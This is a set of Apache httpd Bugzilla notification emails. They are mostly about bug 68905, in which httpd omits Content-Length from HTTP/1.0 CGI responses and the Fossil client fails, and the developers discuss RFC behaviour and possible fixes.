https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #6 from Richard Hipp --- Thank y'all for your time and analysis. Perhaps I was wrong and it is the reply that omits Content-Length, not the request as I originally thought. I see that the Fossil client does not deal well with a missing Content-Length on the reply - because I know that the CGI sent a Content-Length and it never occurred to me that the intervening server might suppress the Content-Length. I'll fix that and see if it resolves the issue. Sorry for the imprecision in this report - I'm not able to reproduce the problem locally and am having to go off of field reports. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #5 from Yann Ylavic --- Note: The response without C-L nor T-E provided by httpd when it cannot determine the body length is what's described in in https://www.rfc-editor.org/rfc/rfc9112.html#name-message-body-length up to bullet #8 (last resort..). -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #4 from Yann Ylavic --- I agree, for HTTP/1.1 httpd would send "Transfer-Encoding: chunked" but not here because of the HTTP/1.0 request. So the only option for httpd is either: 1. bufferize/spool the response to get the full Content-Length before sending the whole in a one go 2. forward the CGI provided Content-Length and verify that the actual body does not overflow it (or abort the connection) 3. trust the CGI provided Content-Length (which is SetEnv "ap_trust_cgilike_cl") and risk response splitting vulns. And 3. is the simpler and probably the only worth the effort for HTTP/1.0 (IMHO). -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #3 from Joe Orton --- I think it is quite reasonable that the server has no compulsion to send Content-Length in HTTP/1.0 responses even if the the CGI script sends them, and relying on that seems highly dubious. https://fossil-scm.org/home/file?name=src/http.c=trunk is a naively written HTTP/1.0 client which does not follow https://datatracker.ietf.org/doc/html/rfc1945#section-7.2.2 (nearly 30 years old) in assuming the response body is always delimited by Content-Length -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 61817] AuthLDAPBindPassword exec: directive (ap_get_exec_line()) creates defunct/zombie
https://bz.apache.org/bugzilla/show_bug.cgi?id=61817 detlef.pangratz@ing.com changed: What|Removed |Added CC||detlef.pangratz@ing.com -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org